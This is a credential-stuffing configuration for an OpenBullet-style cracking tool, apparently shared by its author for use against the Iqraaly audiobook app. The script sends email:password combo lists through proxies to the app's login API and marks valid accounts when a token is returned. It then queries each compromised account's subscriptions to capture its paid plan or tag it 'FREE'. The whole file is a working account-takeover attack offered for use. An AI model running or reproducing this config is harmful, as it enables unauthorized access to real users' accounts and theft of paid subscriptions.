[SETTINGS]
{
  "Name": "iqraaly",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-03-13T11:56:19.5031714+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "🔥 YASHVIRGAMING#7131 🔥",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "iqraaly",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#LOGIN REQUEST POST "https://mobile.iqraaly.com/api/listener/login" 
  CONTENT "device_identifier=AF30A96C-0D6D-4D6D-B616-F4DBCADFB29D&device_information=%7B%7D&password=<PASS>&platform=ios&unique_device_id=AF30A96C-0D6D-4D6D-B616-F4DBCADFB29D&username=<USER>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: mobile.iqraaly.com" 
  HEADER "Accept: */*" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=utf-8" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "User-Agent: Iqraali/4.0.0 (com.innovolve.iqraaly; build:2; iOS 15.3.0) Alamofire/4.7.3" 
  HEADER "Accept-Language: en-CA;q=1.0" 
  HEADER "Content-Length: 200" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "\"code\":3" 
    KEY "Invalid username or password." 
  KEYCHAIN Success OR 
    KEY "\"message\":\"Success." 
    KEY "\"access_token\":\"" 
    KEY "\"code\":0" 

#TK PARSE "<SOURCE>" JSON "access_token" -> VAR "TK" 

#userid PARSE "<SOURCE>" JSON "userid" -> VAR "userid" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid username or password" 
  KEYCHAIN Success OR 
    KEY "{\"access_token\":\"" 

REQUEST GET "https://app.iqraaly.com/api/user/subscriptions" 
  
  HEADER "UsHost: app.iqraaly.com" 
  HEADER "App-Type: ios" 
  HEADER "Accept: */*" 
  HEADER "Device-Uniqid: AF30A96C-0D6D-4D6D-B616-F4DBCADFB29D" 
  HEADER "Local-Country: CA" 
  HEADER "Authorization: Bearer <TK>" 
  HEADER "App-Version: 4.0.0" 
  HEADER "Accept-Language: en-CA;q=1.0" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Access-Token: <TK>" 
  HEADER "User-Agent: Iqraali/4.0.0 (com.innovolve.iqraaly; build:2; iOS 15.3.0) Alamofire/4.7.3" 
  HEADER "Connection: close" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "\"data\":[{\"" 
  KEYCHAIN Custom "FREE" OR 
    KEY "\"data\":[]}" 

#Plan PARSE "<SOURCE>" LR "\"data\":[{\"" "\"]}" Recursive=TRUE CreateEmpty=FALSE -> CAP "Plan" 

FUNCTION Constant "🔥 YASHVIRGAMING#7131 🔥" -> CAP "Config by" 

